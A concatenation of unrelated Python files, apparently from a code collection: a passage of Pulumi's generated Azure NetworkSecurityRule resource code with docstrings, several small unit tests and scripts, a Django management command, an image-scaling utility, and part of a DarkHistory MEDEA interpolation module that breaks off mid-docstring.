is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @source_address_prefix.setter def source_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_address_prefix", value) @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. 
""" return pulumi.get(self, "source_address_prefixes") @source_address_prefixes.setter def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_address_prefixes", value) @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @source_application_security_group_ids.setter def source_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_application_security_group_ids", value) @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> Optional[pulumi.Input[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @source_port_range.setter def source_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_port_range", value) @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. """ return pulumi.get(self, "source_port_ranges") @source_port_ranges.setter def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_port_ranges", value) class NetworkSecurityRule(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, __props__=None): """ Manages a Network Security Rule. > **NOTE on Network Security Groups and Network Security Rules:** This provider currently provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource. At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules. 
## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup", location=example_resource_group.location, resource_group_name=example_resource_group.name) example_network_security_rule = azure.network.NetworkSecurityRule("exampleNetworkSecurityRule", priority=100, direction="Outbound", access="Allow", protocol="Tcp", source_port_range="*", destination_port_range="*", source_address_prefix="*", destination_address_prefix="*", resource_group_name=example_resource_group.name, network_security_group_name=example_network_security_group.name) ``` ## Import Network Security Rules can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:network/networkSecurityRule:NetworkSecurityRule rule1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup/securityRules/rule1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. 
The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ ... @overload def __init__(__self__, resource_name: str, args: NetworkSecurityRuleArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a Network Security Rule. > **NOTE on Network Security Groups and Network Security Rules:** This provider currently provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource. At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup", location=example_resource_group.location, resource_group_name=example_resource_group.name) example_network_security_rule = azure.network.NetworkSecurityRule("exampleNetworkSecurityRule", priority=100, direction="Outbound", access="Allow", protocol="Tcp", source_port_range="*", destination_port_range="*", source_address_prefix="*", destination_address_prefix="*", resource_group_name=example_resource_group.name, network_security_group_name=example_network_security_group.name) ``` ## Import Network Security Rules can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:network/networkSecurityRule:NetworkSecurityRule rule1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup/securityRules/rule1 ``` :param str resource_name: The name of the resource. :param NetworkSecurityRuleArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... 
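    # A minimal sketch (not part of the generated provider code) of the args-based overload
    # documented above. The logical names reuse the resources from the Example Usage docstring
    # and are purely illustrative:
    #
    #     args = NetworkSecurityRuleArgs(
    #         access="Allow",
    #         direction="Inbound",
    #         priority=110,
    #         protocol="Tcp",
    #         source_port_range="*",
    #         destination_port_range="22",
    #         source_address_prefix="*",
    #         destination_address_prefix="*",
    #         resource_group_name=example_resource_group.name,
    #         network_security_group_name=example_network_security_group.name)
    #     rule = azure.network.NetworkSecurityRule("exampleSshInbound", args=args)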
def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(NetworkSecurityRuleArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = NetworkSecurityRuleArgs.__new__(NetworkSecurityRuleArgs) if access is None and not opts.urn: raise TypeError("Missing required property 'access'") __props__.__dict__["access"] = access __props__.__dict__["description"] = description __props__.__dict__["destination_address_prefix"] = destination_address_prefix __props__.__dict__["destination_address_prefixes"] = destination_address_prefixes __props__.__dict__["destination_application_security_group_ids"] = destination_application_security_group_ids __props__.__dict__["destination_port_range"] = destination_port_range __props__.__dict__["destination_port_ranges"] = destination_port_ranges if direction is None and not opts.urn: raise TypeError("Missing required property 'direction'") __props__.__dict__["direction"] = direction __props__.__dict__["name"] = name if network_security_group_name is None and not opts.urn: raise TypeError("Missing required property 'network_security_group_name'") __props__.__dict__["network_security_group_name"] = network_security_group_name if priority is None and not opts.urn: raise TypeError("Missing required property 'priority'") __props__.__dict__["priority"] = priority if protocol is None and not opts.urn: raise TypeError("Missing required property 'protocol'") __props__.__dict__["protocol"] = protocol if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["source_address_prefix"] = 
source_address_prefix __props__.__dict__["source_address_prefixes"] = source_address_prefixes __props__.__dict__["source_application_security_group_ids"] = source_application_security_group_ids __props__.__dict__["source_port_range"] = source_port_range __props__.__dict__["source_port_ranges"] = source_port_ranges super(NetworkSecurityRule, __self__).__init__( 'azure:network/networkSecurityRule:NetworkSecurityRule', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'NetworkSecurityRule': """ Get an existing NetworkSecurityRule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. 
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. 
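
        ## Example Usage

        A minimal sketch of adopting existing rule state with `get` (the logical name is illustrative; the resource ID reuses the format shown in the Import section):

        ```python
        import pulumi
        import pulumi_azure as azure

        existing_rule = azure.network.NetworkSecurityRule.get("existingRule",
            id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup/securityRules/rule1")
        pulumi.export("existingRuleAccess", existing_rule.access)
        ```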
""" opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _NetworkSecurityRuleState.__new__(_NetworkSecurityRuleState) __props__.__dict__["access"] = access __props__.__dict__["description"] = description __props__.__dict__["destination_address_prefix"] = destination_address_prefix __props__.__dict__["destination_address_prefixes"] = destination_address_prefixes __props__.__dict__["destination_application_security_group_ids"] = destination_application_security_group_ids __props__.__dict__["destination_port_range"] = destination_port_range __props__.__dict__["destination_port_ranges"] = destination_port_ranges __props__.__dict__["direction"] = direction __props__.__dict__["name"] = name __props__.__dict__["network_security_group_name"] = network_security_group_name __props__.__dict__["priority"] = priority __props__.__dict__["protocol"] = protocol __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["source_address_prefix"] = source_address_prefix __props__.__dict__["source_address_prefixes"] = source_address_prefixes __props__.__dict__["source_application_security_group_ids"] = source_application_security_group_ids __props__.__dict__["source_port_range"] = source_port_range __props__.__dict__["source_port_ranges"] = source_port_ranges return NetworkSecurityRule(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def access(self) -> pulumi.Output[str]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> pulumi.Output[Optional[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> pulumi.Output[Optional[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> pulumi.Output[Optional[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. 
""" return pulumi.get(self, "destination_port_range") @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of destination ports or port ranges. This is required if `destination_port_range` is not specified. """ return pulumi.get(self, "destination_port_ranges") @property @pulumi.getter def direction(self) -> pulumi.Output[str]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> pulumi.Output[str]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @property @pulumi.getter def priority(self) -> pulumi.Output[int]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @property @pulumi.getter def protocol(self) -> pulumi.Output[str]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). """ return pulumi.get(self, "protocol") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> pulumi.Output[Optional[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. """ return pulumi.get(self, "source_address_prefixes") @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> pulumi.Output[Optional[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> pulumi.Output[Optional[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. 
""" return pulumi.get(self, "source_port_ranges") from unittest import TestCase from word_search_2 import Solution class TestFindWords(TestCase): def test_finds_subset_of_words(self): found_words = Solution().findWords( [ ['o', 'a', 'a', 'n'], ['e', 't', 'a', 'e'], ['i', 'h', 'k', 'r'], ['i', 'f', 'l', 'v'] ], ["oath", "pea", "eat", "rain"] ) self.assertEqual(2, len(found_words)) self.assertTrue("oath" in found_words) self.assertTrue("eat" in found_words) def test_single_word(self): self.assertEqual( ["a"], Solution().findWords( [["a"]], ["a"] ) ) task_test/date_helper_test.py ''' date helper unit test case @author: Huiyugeng ''' import unittest import datetime from task.trigger import date_helper class DateHelperTest(unittest.TestCase): def test_date_helper(self): '''next_seconds test''' _time = date_helper.next_seconds(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10) '''next_minutes test''' _time = date_helper.next_minutes(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10 * 60) '''next_hours test''' _time = date_helper.next_hours(10) _now = datetime.datetime.now() delta = (_time - _now).seconds self.assertEqual(int(round(delta)), 10 * 60 * 60) '''today test''' _time = date_helper.today() _now = datetime.date.today() self.assertEqual(_now.year, _time.year) self.assertEqual(_now.month, _time.month) self.assertEqual(_now.day, _time.day) '''next_days test''' _now = datetime.datetime.now() _time = date_helper.next_days(3, _now.hour, _now.minute, _now.second) delta = (_time - _now).days self.assertEqual(int(round(delta)), 2) 0 entradas = int(input()) for i in range(entradas): falantes = int(input()) lingua = "" for j in range(falantes): lingua += input() + " " linguas = set(lingua.strip().split(" ")) print("ingles") if len(linguas) > 1 else print(linguas.pop()) jembatan/pipeline/__init__.py0 from typing import Iterable from jembatan.core.spandex import JembatanDoc class SimplePipeline: """ Class wrapping common functions for processing document collections """ @classmethod def iterate(cls, collection: Iterable[JembatanDoc], stages: Iterable): """ Process Spandex collection Iterator over processed Spandexes. Useful if you want to work with the Spandex objects beyond just processing the pipeline. This is one way to instrument collection of results for evaluation without putting it into your pipeline. 
""" for jemdoc in collection: for stage in stages: stage.process(jemdoc) yield jemdoc @classmethod def iterate_by_stage(cls, collection: Iterable[JembatanDoc], stages: Iterable): for i, jemdoc in enumerate(collection): path = [] for stage in stages: path.append(str(stage)) stage.process(jemdoc) yield i, '/'.join(path), jemdoc @classmethod def run(cls, collection: Iterable[JembatanDoc], stages: Iterable): """ Executes a linear pipeline of stages and runs collection_process_complete on those stages """ for jemdoc in cls.iterate(collection, stages): pass for stage in stages: # allow annotators to do cleanup try: getattr(stage, 'collect_process_complete') stage.collection_process_complete() except AttributeError: pass #!/usr/bin/env python3 # -*- coding: utf-8 -*- import struct import sys from math import sqrt from PIL import Image MAX_SAMPLE_DIM = 32 * 1024 OUTPUT_SIZE = 300 CROP_FACTOR = .25 # Limits crop of longer dimension MAX_ASPECT = 2 # Limits aspect ratio def load_and_scale(image_path: str) -> Image.Image: try: with Image.open(image_path) as img: if getattr(img, 'is_animated', False): img.seek(img.n_frames - 1) # Last frame is a safe choice # pytype: disable=attribute-error if img is not None and (img.width > MAX_SAMPLE_DIM or img.height > MAX_SAMPLE_DIM): print( 'Image dimensions too large! {}x{} > {msd}x{msd}, file: {}'.format( img.width, img.height, image_path, msd=MAX_SAMPLE_DIM), file=sys.stderr, ) img = None else: img = img.convert('RGB') except (OSError, SyntaxError, Image.DecompressionBombError, struct.error) as e: print('Caught error loading {}: {}'.format(image_path, e), file=sys.stderr) img = None if img is None: print('Generating blank sample image due to unusable file', file=sys.stderr) return Image.new('RGB', (OUTPUT_SIZE, OUTPUT_SIZE)) # Black replacement image # Crop down longer dimension def lim(l: int, s: int) -> int: return max(round(l - CROP_FACTOR * sqrt(l * s)), s) w, h = img.size w_crop, h_crop = (lim(w, h), h) if w >= h else (w, lim(h, w)) h_inset, v_inset = round((w - w_crop) / 2), round((h - h_crop) / 2) img = img.crop((h_inset, v_inset, w - h_inset, h - v_inset)) # Nearest-neighbor aspect adjust def limar(l: int, s: int) -> int: return round(min(l, MAX_ASPECT * s)) w, h = img.size w_sc, h_sc = (limar(w, h), h) if w >= h else (w, limar(h, w)) img = img.resize((w_sc, h_sc), Image.NEAREST) # Bilinear proportional scale (w, h), l = img.size, max(*img.size) w_sc, h_sc = round(OUTPUT_SIZE * w / l), round(OUTPUT_SIZE * h / l) img = img.resize((w_sc, h_sc), Image.BILINEAR) # Paste onto background bg = Image.new(img.mode, (OUTPUT_SIZE, OUTPUT_SIZE), 'black') # pytype: disable=wrong-arg-types (w, h), l = img.size, max(*img.size) xoff, yoff = round((l - w) / 2), round((l - h) / 2) bg.paste(img, (xoff, yoff)) return bg if __name__ == '__main__': image_path, save_path = sys.argv[1:] img = load_and_scale(image_path) img.save(save_path, compress_level=1, exif=None) import machine adc = machine.ADC(0) adc.read() from django.core.management.base import BaseCommand, CommandError from geoinfo.models import GISLayerMaster from geoinfo.utils.layers import GeomParser class Command(BaseCommand): help = 'Manage geoinfo things.' 
def __init__(self, stdout=None, stderr=None, no_color=False): super(Command, self).__init__(stdout, stderr, no_color) def add_arguments(self, parser): parser.add_argument('--rebuild-layers', action='store_true', dest='rebuild_layers', default=False, help='Call GeomParser.process_geoinfo_to_layer() on every GISLayerMaster in the database') def handle(self, *args, **options): ''' :param args: :param options: :return: ''' layers_qs = None if options['rebuild_layers']: layers_qs = GISLayerMaster.objects.all() self.rebuild_layers(layers_qs) else: self.stdout.write("A valid option was not given. Exiting.") return def rebuild_layers(self, layers_qs): count = 1 for layer in layers_qs: try: gp = GeomParser(layer) gp.process_geoinfo_to_layer() except Exception as e: self.stdout.write("Exception occurred processing layer id: {}, layer title: {} : {}".format(layer.id, layer.name, str(e))) self.stdout.write("layers processed:{}".format(count)) count += 1 1-10 """ Deposition of energy from low-energy electrons As detailed in section III.F.2 of the paper, low-energy electrons (sub-3keV electrons) deposit their energy into the IGM through hydrogen/helium ionization, hydrogen excitation, heat, and continuum photons. To calculate how much energy is deposited into each channel we use the MEDEA results [1]_ as described in the paragraph before Eq. (45) of the paper. """ import sys sys.path.append("../..") import numpy as np import scipy.interpolate as interp import darkhistory.physics as phys import darkhistory.utilities as utils import os cwd = os.getcwd() abspath = os.path.abspath(__file__) dir_path = os.path.dirname(abspath) #dir_path = os.path.dirname(os.path.realpath(__file__)) def make_interpolator(interp_type='2D', cross_check=False): """Creates cubic splines that interpolate the Medea Data. Stores them in globally defined variables so that these functions are only computed once Assumes that the data files are in the same directory as this script. Parameters ---------- interp_type : {'1D', '2D'}, optional Returns the type of interpolation over the MEDEA data. 
Returns ------- Interpolator2D or function The interpolating function (takes x_e and electron energy) """ if cross_check: engs = np.array([14., 30, 60, 100, 300, 3000]) else: engs = np.array([10.2, 13.6, 14, 30, 60, 100, 300, 3000]) #print('AHHHHHH NOOOOOO!') grid_vals = np.zeros((26, len(engs), 5)) os.chdir(dir_path) # load MEDEA files for i, eng in enumerate(engs): with open('results-'+str(eng)+'ev-xH-xHe_e-10-yp024.dat','r') as f: lines_list = f.readlines() # load ionization levels only once if i==0: xes = np.array([float(line.split('\t')[0]) for line in lines_list[2:]]) # load deposition fractions for each energy grid_vals[:,i,:] = np.transpose(np.array([ [ #set 0 to 10^-15 to avoid -\infty # HL: changed to 1e-4 for consistency with Tracy max(float(line.split('\t')[k]),1e-4) for line in lines_list[2:] ] for k in [1,2,3,4,5] ])) os.chdir(cwd) if interp_type == '2D': MEDEA_interp = utils.Interpolator2D( xes, 'xes', engs, 'engs', grid_vals, logInterp=True ) elif interp_type == '1D': from scipy.interpolate import interp1d class Fake_Interpolator2D: def __init__( self, interp_log_xe_func ): self.interp_log_xe_func = interp_log_xe_func def get_vals(self, xe, eng): log_grid_vals = interp_log_xe_func(np.log(xe)) interp_log_eng_func = interp1d( np.log(engs), log_grid_vals, axis=0, bounds_error=False, fill_value=(log_grid_vals[0], log_grid_vals[-1]) ) return np.exp(interp_log_eng_func(np.log(eng))) interp_log_xe_func = interp1d( np.log(xes), np.log(grid_vals), axis=0 ) MEDEA_interp = Fake_Interpolator2D(interp_log_xe_func) else: raise TypeError('Invalid interp_type.') return MEDEA_interp def compute_fs(MEDEA_interp, spec_elec, xe, dE_dVdt_inj, dt): """ Given an electron energy spectrum, calculate how much of that energy splits into continuum photons, lyman_alpha transitions, H ionization, He ionization, and heating of the IGM. Parameters ---------- spec_elec : Spectrum object spectrum of low energy electrons. spec_elec.toteng() should return energy per baryon. 